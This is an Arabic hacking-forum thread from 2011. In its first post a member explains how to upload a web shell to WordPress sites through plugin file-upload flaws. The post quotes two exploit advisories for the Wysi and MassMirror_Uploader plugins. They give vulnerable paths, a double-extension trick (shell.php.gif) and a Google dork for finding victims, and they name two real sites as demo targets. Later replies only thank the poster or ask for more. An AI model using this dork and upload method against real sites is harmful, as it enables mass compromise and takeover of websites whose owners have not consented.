التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 07-19-2011, 12:56 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية b10001
 

 

 
إحصائية العضو







b10001 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
b10001 is on a distinguished road

.... شرح تحميل الشل على الوردبريس باصور


بسم الله الرحمن الرحيم

بعد الموضوع "ثغرة تحميل في الوورد بريس ..قررت الاستجابة لمطالب الشرح..
ثغرة التحميل عشوائية عن طريق القوقل وآلاااف المواقع مصابة






اخذنا موقع مصاب الى رح يكون مثل ما في الصورة
نحط
الشل وننتظر الموفقة












عند الموافقة علي التحميل
نحط اسم شل في الموقع ومبروك



ثغرات الووردبرس

كود PHP:
# Exploit Title: WordPress Wysi Plugin Arbitrary File upload Vulnerability
# Date: June, 14th 2011 [GMT +7]
# Author: Net.Edit0r
# Software Link: http://wordpress.org/extend/plugins/real-wysiwyg/
# Version : 0.0.2
# Tested on: ubuntu 11.04
# CVE : -

-----------------------------------------------------------------------------------------
WordPress Wysi Plugin Arbitrary File upload Vulnerability => RFU Vulnerability
-----------------------------------------------------------------------------------------

Author Net.Edit0r
Date 
June14th 2011 [GMT +7]
Location Iran
Web 
http://Black-Hg.Org
Critical Lvl Medium
Where 
From Remote
My Group 
Black Hat Group #BHG
---------------------------------------------------------------------------


Vulnerability:
~~~~~~~~~~~~
in this file you can upload image files without any authentication.

for 
uploading shell you must change extension of file to
.php.gif(shell.php.gif)

or 
any other image extension.successful attack depend to host and
server config.



PoC/Exploit:
~~~~~~~~~~

~ [
PoC] ~: /wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php

~ [PoC] ~: Http://[victim]/path-to-wp/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php

        
Upload To : /wp-content/content/shell.php.jpg ]

Dork:
~~~~~
Google inurl:"/filemanager/InsertFile/insert_file.php"


Demo URL:
~~~~~~~~~
http://www.kalamu.com/bol/wp-content/plugins/filemanager/InsertFile/insert_file.php

http://www.afofoundation.org/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php


 
Timeline:
~~~~~~~~~
13 06 2011 bug found.
13 06 2011 vendor contactedbut no response.
14 06 2011 Advisories release.

 
Contact:
~~~~~~~~~ 

كود PHP:
######################################################################## 

# Vendor: http://www.wordpress.com/

# Author : indoushka 

# Inj3ct0r Team http://77.120.101.55/

# Thanks to : Dz-Ghost Team

# Contact : http://www.appinsecurity.com

# Tested on : windows SP2 Francais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 
-------------

plugins

http
://127.0.0.1/wordpress/wp-content/plugins/MassMirror_Uploader/Base/

http://127.0.0.1/wordpress/wp-content/plugins/MassMirror_Uploader/Base/uploaded_files/ 







avp jpldg hgag ugn hg,v]fvds fhw,v

التوقيع

http://img198.imageshack.us/img198/1722/sansredrh.jpg

http://im16.gulfup.com/2011-10-15/131870922211.gif
[SIZE="7"][COLOR="Lime"]

 

   

رد مع اقتباس
قديم 07-19-2011, 01:42 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية k4$p3r-MA
 

 

 
إحصائية العضو








k4$p3r-MA غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
k4$p3r-MA is on a distinguished road

افتراضي


واصل حبيبي
مشكور


ان شاء الله تكون لك بصمة في اكتشاف التغرات

التوقيع

http://www.cafe-hbal.com/up/uploads/13369618701.gif

دعواتكم معنا بالنجاح و لجميع المسلمين
Yes I we will bE BaCk 2013

 

   

رد مع اقتباس
قديم 07-19-2011, 09:08 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي


الصور ماضهرت :( ممكن تعاود ترفعها ؟

   

رد مع اقتباس
قديم 07-19-2011, 10:10 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو








cisco_security غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
cisco_security is on a distinguished road

افتراضي


ممكن تشرح اكثر ان امكن ياغالي ؟؟؟

التوقيع

OFF Line

My be will return one day

Inchalah

 

   

رد مع اقتباس
قديم 07-22-2011, 12:40 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية Mcool
 

 

 
إحصائية العضو





Mcool غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Mcool is on a distinguished road

افتراضي


بارك الله فيك أخي

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 10:42 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0